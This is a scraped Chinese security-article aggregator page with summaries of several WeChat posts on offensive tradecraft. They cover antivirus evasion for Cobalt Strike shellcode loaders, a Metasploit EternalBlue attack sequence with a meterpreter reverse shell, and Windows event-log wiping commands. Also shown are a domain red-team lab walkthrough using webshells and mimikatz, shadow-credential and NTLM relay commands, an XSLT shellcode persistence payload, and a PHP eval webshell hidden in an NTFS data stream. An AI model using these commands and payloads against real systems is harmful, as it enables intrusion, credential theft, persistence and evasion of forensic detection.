【技术分享】cs免杀系列 安全文章

【技术分享】cs免杀系列

点击上方蓝字关注我们0x00 编译的系统win10用的杀软:win10自带、360、火绒。杀软全部更新时间2021/8/6 11:30编程语言:golang0x01 这是网上找的 shellcode 最简单的加载器简单的意思是申请一段虚拟地址,调用,执行。编译一下看看查杀情况 go build -ldflags=”-w -s” 这里没有去掉黑框。只有360不杀:运行起来:0x02目前为止360已经死掉了,正常编译什么都还没做,360第一个over。这里不用异或了,对火绒和win10没啥用,直接死掉了。尝试和其他正常源码合在一起。全都死翘翘了。0x02加个base64编码试试看,直接对shellcode进行编码。火绒直接死掉了,很玄幻。简单的base64居然直接过了火绒。0x04试下win10的,也是一样全过= =END好文!必须在看 本文始发于微信公众号(SecTr安全团队):【技术分享】cs免杀系列
阅读全文
利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7 安全文章

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7

利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7一、环境配置(两台主机均采用 NAT 桥接模式)1、Kali 主机的 IP 配置:2、Windows7 主机的 IP 配置:3.查看 Win7 主机打开的端口二、利用 MSF 框架对 Win7 进行永恒之蓝渗透【实战篇】1、启用 msfconsole 攻击平台2、查找目标主机的漏洞编号3、使用永恒之蓝漏洞模块4、设置 Payload5、查看 Payload 的设置情况6、实施攻击msf5 > search ms17_010msf5 > use exploit/windows/smb/ms17_010_eternalbluemsf5 exploit(windows/smb/ms17_010_eternalblue) > set payloadwindows/x64/meterpreter/reverse_tcpmsf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.100.131rhost => 192.168.100.131msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.100.128lhost => 192.168.100.128msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 1234msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit7、攻入目标主机8、查看目标主机的操作系统信息9、对目标主机的屏幕进行截图10、查看目标主机所有的用户名和密码(密码显示为 hash 值)11、关闭防火墙12、关闭 Telnet 服务net stop TlntSvr13、用两种方法开启远程桌面服务,并查看远程桌面功能启用情况(1)方法 1:run getgui -e(2)方法 2:run post/windows/manage/enable_rdp14、创建系统用户run getgui –u test –p 123456三、利用 MSF 框架对 Win7 进行永恒之蓝渗透【防御篇】1、在打开 445 端口的前提下,利用系统自带的防火墙进行规则过滤1)在 win7 上打开防火墙设置窗口,并启用防火墙2)没有设置防火墙过滤规则前用 Nmap 对目标主机进行端口扫描3)针对 445 端口设置过滤规则4)设置防火墙过滤规则后的端口扫描5)目标主机设置针对 445 端口的过滤规则后,kali 再对目标主机实施攻击 本文始发于微信公众号(疯猫网络):利用 ms17-010(永恒之蓝)漏洞入侵渗透 Win7
阅读全文
痕迹清理-Win日志 安全文章

痕迹清理-Win日志

一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚日志我们电脑被入侵之后,运维人员想看如何被入侵的、想溯源攻击者都是通过看日志,发现蛛丝马迹顺着网线爬过去。反之我们不想被发现咋入侵的,就需要删除日志,防止被溯源。WIN日志win日志记录着Win系统及其各种服务运行的每个细节,对增强Windows的稳定和安全性,起着非常重要的作用。系统日志:记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据。c:windowssystem32winevtLogsSystem.evtx应用程序日志:包含应用程序或系统程序记录的事件,主要记录程序运行方面的事件。C:windowssystem32winevtLogsApplication.evtx安全日志:记录系统的安全审计事件,包含各种类型的登陆日志、对象访问日志、进程追踪日志、特权使用、账号管理、策略变更和系统事件。c:windowssystem32winevtLogsSecurity.evtx清理日志msf使用msf框架完成渗透后,使用clearev命令清除日志也可以使用事件管理模块清除日志(我没运行成功)-i参数显示事件信息run event_manager -i-c参数清除所有日志run event_manager -c可清除指定日志run event_manager -c systemwevtutil+for循环清除所有日志Wevtutil是用来查看事件的系统工具,可以卸载事件清单,导出,归档和清除日志for /F "tokens=*" %a in ('wevtutil.exe el') DO wevtutil.exe cl "%a"最后留下一个ID为1102的日志清除事件ps批量删日志如果反弹shell是ps弹的,可以使用ps命令来删除日志wevtutil el | Foreach-Object {Write-Host "Clearing $_"; wevtutil cl "$_"}使用PS清理指定的系统日志Clear-Eventlog -LogName SecurityClear-Eventlog -LogName SystemPhant0m脚本这个脚本是用来杀死日志服务的,在日志服务进程中检测并杀死负责事件日志服务的线程,这样日志服务虽然运行但没法记录日志(畅游无阻)下载地址:https://github.com/hlldz/Phant0mpowershell –exec bypass –Command "& {Import-Module 'C:Invoke-Phant0m.ps1';Invoke-Phant0m}"其他日志IIS日志iis默认会每天记录一次日志,能记录下我们详细的入侵过程%systemroot%system32logfilesw3svc1在该目录下删除指定日期的日志如果无法删除文件,首先需要停止w3svc服务,再删除即可net stop w3svc不同的 Win版本iis日志路径不一样,这里列出几个C:WindowsSystem32LogFiles #win_s_2003C:inetpublogsLogFiles # win_s_2008r2apache日志apache默认日志在安装目录下的logs目录中D:phpStudyApachelogsFTP日志默认每天一个日志,清理当天日志即可%systemroot%system32logfilesmsftpsvc1计划任务日志计划任务也会记录各种日志%systemroot%Tasksschedlgu.txt删除时提示无法访问,需要把服务先关闭net stop schedule 原文始发于微信公众号(南街老友):痕迹清理-Win日志
阅读全文
用Windows打造自己精简便捷的渗透工具集 安全工具

用Windows打造自己精简便捷的渗透工具集

背景因为工作原因对公司上线的web系统进行测试,所以需要经常用到burpsqlmap、dirb(支持目录递归)等工具,每次打开kali虚拟机这个占用20G磁盘4G内存的重量级工具,就用其中两三款用完再关,磁盘IO要反应老半天,重新打开又要老半天,于是我想到把常用的工具搬到win下来。win下大家耳熟能详的工具应该就是大名鼎鼎的pentestbox,可能我和它合不来,印象中我装了三次里面的nmap都没好用,而且它对我来说也是重量级了,动不动几个G磁盘没了,太占磁盘而且大部分工具可能用不到,而且你还得学习一下它的目录划分,工具设置配置什么的,我就研究研究利用cmder打造自己的win工具的技巧,说实话呢,前期失败了,没有专研,所以放弃了,今天突然灵感居然成功了。目标常用的工具能像kali的命令一样使用,比如kali使用sqlmap命令,那咱们就用sqlmap命令而不是sqlmap.py。看完这篇文章你可以灵活打造自己的工具集。cmder介绍:官网 https://cmder.net/ 其实pentestbox用的终端就是cmder, 其实cmder是Windows下cmd终端最理想的替代品,它支持了大部分的Linux命令。支持ssh连接linux,使用起来非常方便。比起cmd、powershell、conEmu,其界面美观简洁,功能强大。需要的可以自行了解。下面贴个我的截图:cmder安装没下,你从官网下载完整版,然后解压放到一个想放的目录里就可以了这里我放D盘的program files x86文件夹了 (注意:第一次打开cmder要点击cmder.exe右键管理员运行便于它的安装各种Linux命令工具)。cmder的目录结构:然后把cmder的路径添加到环境变量,就可以使用cmder命令了,这不是主要的,主要就是你使用win+r然后输入cmder即可打开cmder,支持浏览器那样的快捷键如Ctrl+T新建标签页等等,其实cmder也可以添加到右键菜单,详细的请自行百度。构建工具目录先截图看看我的工具的大分类,有web工具,逆向,信息收集工具,先这几类吧!这几类下面的子目录放各种工具,这样方便迁移,因为安全工具多体积大,所以不放C盘。下载安全工具并配置说明:如果你在本机安装了nmap、msf之类的,在cmd可以直接使用的话,在cmder中也可以直接使用,下面以sqlmap为例说明,如果在win下你把sqlmap的目录添加到环境变量,可能是无法使用sqlmap.py命令,即使能使用每次都是输入完整文件名如sqlmap.py,咱们要做成kali那种直接使用sqlmapsqlmap的下载配置(sqlmap已经支持python3.x了)https://github.com/sqlmapproject/sqlmap 下载源代码放到咱们的工具目录,如下:已经放好了,现在在cmder中还不能用,下面需要创建一条sqlmap命令,说是创建只是给咱们的sqlmap启动添加个别名 因为启动sqlmap的命令是 python sqlmap.py,咱们的sqlmap是在D:sec_toolstools_websqlmap,所以咱们本地的sqlmap启动命令是python D:sec_toolstools_websqlmapsqlmap.py,打开cmder的配置命令别名文件,在cmder的config目录下的复制一份user_aliases的备份,打开user_aliases,在文件中添加咱们的命令别名如下:注意:在命令的后面我用红框标记的$*一定要带上,不然sqlmap命令是无法读取参数的,带上才能正常使用sqlmap的各个参数下面附一张报错的图:所以那个命令末尾要有参数的话要加上$*,再来一张成功的图:如果你在本地安装了nmap和msf什么的,在cmder中可以直接用的,下面来个nmap的截图:利用文中同样的方法,你可以把常用的各种python工具集成到一起了,形成自己的一个工具集,而且使用上和kali中的命令一样! 本文始发于微信公众号(疯猫网络):用Windows打造自己精简便捷的渗透工具集
阅读全文
WIN2003本地提权检测工具 安全工具

WIN2003本地提权检测工具

具原理很简单。读取注册表再和自己的补丁列表比较下。没有的就输出。你们也可以写。只是有时候看溢出补丁名称看到头疼。所以就写了这个工具。当然你们可以用bat命令一键的,你们喜欢就行开发环境:.NET2.0补丁列表不完全,尚有未知bug。欢迎提出整改意见。有问题请反馈,不喜勿喷。代码稍后送上。链接:http://pan.baidu.com/s/1i4r7pHV 密码:6kyq 本文始发于微信公众号(关注安全技术):WIN2003本地提权检测工具
阅读全文
【红蓝攻防】ATT&CK红队评估实战靶场1 安全文章

【红蓝攻防】ATT&CK红队评估实战靶场1

0x00 网络拓扑及环境部署攻击机:kali linux ,vmnet1模式,ip:192.168.54.128web服务器:win7,双网卡,vmnet1和vmnet2,内网ip:192.168.52.143,外网ip:192.168.54.129域成员主机:win2k3,vmnet2,ip:192.168.52.141内网域控主机:winserver 2008 r2,vmnet2 ,IP:192.168.52.138备注:WIN7手动开启phpstudy。建议大家按照官方下载地址页面下面的截图去配置靶场的IP,我当时配置了差不多一天了都(尤其是win7的配置容易错)。0x01 信息收集使用nmap探测内网主机地址nmap -sV -sS -A 192.168.54.0/24发现192.168.54.129为存活主机并发现开放了80web服务端口以及3306mysql数据库端口,访问80端口显示phpstudy探针。通过信息收集,我们拿到了管理员邮箱、服务器主机名、服务器指纹(PHP版本号、apache容器)同时还发现数据库连接检测,使用最简单的弱口令测试:root/root,发现数据库连接正常,说明是存在弱口令漏洞。接下来我们尝试扫描下目录。扫描后发现有phpmyadmin的数据库管理页面以及beifen.rar的备份文件。0x02 web渗透访问phpmyadmin页面,使用上面知道的root/root弱口令登录进去,找到一个newyxcms的数据库,说明可以是在用一个yxcms的内容管理系统,所以我们可以尝试访问http://192.168.54.129/yxcms可以访问主页,同时在公告信息有说明后台地址是/index.php?r=admin,用户名admin密码123456,所以我们直接登录后台。登录后台后看到前台模板中可以管理模板文件,也就说可以直接编辑PHP文件,那不就是可以........不多说,直接在其中一个info.php文件写入webshell,因为要使用冰蝎,所以用冰蝎自带的马然后突然发现不知道文件是保存在哪个路径了,直接百度搜可知模板文件存放在/protected/apps/default/view/路径下,突然发现还存在目录遍历漏洞,最后我们在protected/apps/default/view/default路径下找到了info.php的木马文件上冰蝎0x03 系统信息收集发现存在一个域god.org,以及内网IP地址:192.168.52.143。然后我们可以换成cs后渗透工具,具体怎么使用我就不说了,百度慢慢摸索先关闭一下防火墙:netsh advfirewall set allprofiles state off使用net view查看域列表使用net config workstation查看当前登录的域与用户信息查看域内用户net user /domain使用CS中的dump hash模块导出散列值然后可以使用mimikatz获取一下系统明文账号密码整理一下收集到域的信息域:god.org域内的三个用户:Administrator/ligang/liukaifeng01域内三台主机:OWA(域控,192.168.52.138)、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7,192.168.52.143)0x04 拿下域控本节不详细说了(实在写不下去了),拿下一台域主机后,用cs抓到域管理员账户密码,然后通过扫描端口发现开放了139和445端口,可以使用与msf联动通过漏洞进去或者用CS使用域管理员账户建立SMB连接拿下其他域主机,上线。●【渗透测试】DC-1通关手册●【渗透测试】Raven-1通关手册●【渗透测试】wakanda-1通关手册●【漏洞复现】蓝凌0A后台密码读解密(附POC)微信搜一搜暗魂攻防实验室 本文始发于微信公众号(暗魂攻防实验室):【红蓝攻防】ATT&CK红队评估实战靶场1
阅读全文
Shadow Credentials简单利用流水帐 安全闲碎

Shadow Credentials简单利用流水帐

0x00 前置条件上周的测试记录,可能有错漏的地方,暂时不改发出来吧。下面所有操作,尽在测试环境完成。仅供参考谁能新增域管KeyCredential AdminsAcl高权限用户机器账号给自己新增给哪个受害者新增(高价值目标)域用户(域管等)域机器账号(DC/EX等)0x01 攻击域用户这里的win7是域管(之前某次测试中提权了)新增msDS-KeyCredentialLink属性//addpython3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "add" -o test1 --dc-ip dc3.bsec.corp利用环节: 获取目标Win10 hash列举和删除新增的KeyCredentialLink//listpython3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "list" -o test1 --dc-ip dc3.bsec.corp//delpython3 pywhisker.py -d "bsec.corp" -u "win7" -p "your_password" --target "win10" --action "remove" --device-id fcfce57f-eddb-e428-18c3-a844f750fc05 --dc-ip dc3.bsec.corp0x02 攻击域内高价值机器账号目标ex03: exchange机器账号新增msDS-KeyCredentialLink属性利用环节: 获取目标ex03 hash测试权限0x03 其他简单测试case域控机器账号DC2$(AD CS)编辑win10的KeyCredentialLink失败Ex机器账号Ex03$编辑win10的KeyCredentialLink失败域控机器账号DC2$(AD CS)编辑DC3$的KeyCredentialLink失败域普通用户win8编辑win8(自己)的KeyCredentialLink失败域机器用户iis$编辑iis$(自己)的KeyCredentialLink成功0x04 ntlm 中继添加msDS-KeyCredentialLinkefs+webdav 打DC2$ (无签名)默认server不会有webdav,我是之前测试刚好安装&启动了的python3 ntlmrelayx.py  --shadow-credent --shadow-target 'dc2$' -t ldap://dc4 --remove-mic 拿着pfx,玩法同上efs+smb(remove-mic 有签名) 打PC147-WIN7SP1$邮件打域管理(无签名)-->打所有机器和域用户 (操作同之前文章)全补丁域森林5秒沦陷?加密升级之信任雪崩和其他relay操作类似, 前置条件ok的情况下打0x05 图片来源及参考Relai NTLMpywhisker协议库: pydsinternalsShadow Credentials: Abusing Key Trust Account Mapping for Account Takeover0x06 思考和委派之类操作测试,新增后,就获得一张长期饭票(不管目标密码怎么换)。权限维持还是很舒服的比委派舒服的就是可以打用户&机器账号,场景更广,组合拳更多,并且还可以拿到ntlmhash.拿着的证书有效期页很长, 隐秘性也还不错.做域内权限驻留,目前肯定不错的,委派太多规则了。这个比较新.不需要AD CS Web也有一些组合拳玩.一封邮件过去, 可能域就拿下了. relay0x07 最新动态知识星球: 红蓝早读 (碎片记录)公众号: 甲方安全建设 (整理沉淀)作者: red4blue (交流讨论)公众号增改字数和次数有限,防御检测策略,其它拓展思考,可能会留到群里讨论,留到星球沉淀. 本文始发于微信公众号(甲方安全建设):Shadow Credentials简单利用流水帐
阅读全文
基础命令使用 [ win篇 ] 安全闲碎

基础命令使用 [ win篇 ]

    在此,非常感谢那些一直以来给予我莫大支持和鼓励的朋友们,因为有你们,让我知道,自己此时做的事情是有意义的,我会好好坚持自己的初心,为大家提供更多更优质实用的东西,另外,能跟大家一起成长进步,也是我自己的莫大荣幸...最后,非常期待你们的 '捐助' 和 '建议',捐助时请务必备注自己的 'id',我会一直默默关注你们的,说不定我们的关系还能更进一步 '成为更好的朋友' 呢 今天还是老样子,请 '阅读原文'  本文始发于微信公众号(红队防线):基础命令使用 < win篇 >
阅读全文
[ 限时优惠 ] 免杀 win 单机权限维持 [ winlogon ] 安全文章

[ 限时优惠 ] 免杀 win 单机权限维持 [ winlogon ]

简单理解 Winlogon:它主要是用来处理整个交互式用户登录注销过程的,当它捕捉到用户名和口令后会先把它丢给lsass.exe,之后lsass再去调用相应的dll进行认证,认证成功后便会生成一个访问令牌,winlogon再利用此令牌去创建用户会话中的各种初始化进程,而这些要初始化的进程就被放在HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogon 项下的各个值里,比如,Uerinit,Notify ,Shell等等等...我们要利用的恰巧也就是这里,实际渗透中,当拿到目标win机器的最高权限,做完该做的事情之后< 特别注意,通常情况下,"维持" 一般都会在拿到目标机器的最高权限 之后再进行,实战中如果以一个低权限去维持意义不太大,无非是在自找麻烦,至于提权利用的那种另说>,就可以试着把payload插到这些项值下面,当然啦,各种AV也肯定会死死监控住winlogon下的这些敏感值,此处我们暂时不必理解的过深,只需了解到windows的大致启动初始化执行过程即可,先侧重在实际利用上模拟环境:AV-Server     192.168.3.23win2008r2 最新版360套装 首先, Uerinit值    第一种,尝试免杀自启动,执行powershell,首先,准备好payload, 如下,即 shellcode.xslt文件内容, 用的 64位 c# shellcode 最好和目标系统位数保持一致,shellcode是直接拿cs生成的<xsl:stylesheet version="2.0"                xmlns:xsl="http://www.w3.org/1999/XSL/Transform"                xmlns:msxsl="urn:schemas-microsoft-com:xslt"                xmlns:Stacks="urn:MyModule"><msxsl:script implements-prefix="Stacks" language="C#"><msxsl:using namespace="System.Runtime.InteropServices" />    <!></msxsl:script><xsl:template match="data">    <result>      <xsl:value-of select="Stacks:Exec()" /></result></xsl:template></xsl:stylesheet>exec.gif文件 内容,用来执行上面的shellcode如下:Function xslt_exec{<#.EXAMPLEC:PS> xslt_exec -xslt_url https://raw.githubusercontent.com/calc.xslt#>        param    (                $xslt_url    )    $xslt_settings = new-object System.XML.XSl.XsltSettings    $xslt_settings.EnableScript = $true    $xslt = new-object System.XML.Xsl.XslCompiledTransform    $XmlResolver = new-object System.XML.XmlUrlResolver    $xslt.Load($xslt_url,$xslt_settings, $XmlResolver)    $doc...
阅读全文
Win下MySQL提权时无法创建目录解决办法及数据流隐藏Webshell 安全文章

Win下MySQL提权时无法创建目录解决办法及数据流隐藏Webshell

这个其实是NTFS惹的祸。NTFS中的ADS(交换数据流)可以建立目录,隐藏webshell等等。0x01 Mysql创建目录当MySQL版本较高时,自定义函数的dll需要放在mysql目录下的libplugin。一般普通的脚本是没有在这个文件夹下创建文件夹的权限的。这里可以用到ads来突破:select 'xxx' into outfile 'D:\mysql\lib::$INDEX_ALLOCATION';会在mysql目录下生成一个lib目录,这样你就可以将你的udf放在这个插件目录下了。   0x02 隐藏webshell在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:echo ^<?php @eval(request)?^>  > index.php:a.jpg这样子就生成了一个不可见的shell a.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个a.jpg的。我们可以在另外一个正常文件里把这个ADS文件include进去,<?php include(‘index.php:a.jpg’)?>,这样子就可以正常解析我们的一句话了。其他ads的利用各位可以参考互联网。 本文始发于微信公众号(T00ls):Win下MySQL提权时无法创建目录解决办法及数据流隐藏Webshell
阅读全文